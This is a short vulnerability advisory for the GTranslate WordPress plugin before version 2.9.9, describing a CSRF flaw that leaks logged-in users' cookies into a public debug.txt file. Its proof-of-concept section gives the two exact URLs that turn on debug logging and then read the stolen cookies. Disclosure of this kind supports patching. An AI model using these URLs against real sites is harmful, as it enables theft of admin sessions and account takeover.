WordPress Plugin Vulnerabilities
Translate WordPress with GTranslate < 2.9.9 - CSRF to Account Takeover
Description
The plugin does not have CSRF check in some files, and write debug data such as user's cookies in a publicly accessible file if a specific parameter is used when requesting them. Combining those two issues, an attacker could gain access to a logged in admin cookies by making them open a malicious link or page
Proof of Concept
Make a logged in admin (or any other account you want to gain access to) open https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=es&gurl=PoC&enable_debug Then access https://example.com/wp-content/plugins/gtranslate/url_addon/debug.txt to get the users cookies
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Diogo Real
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)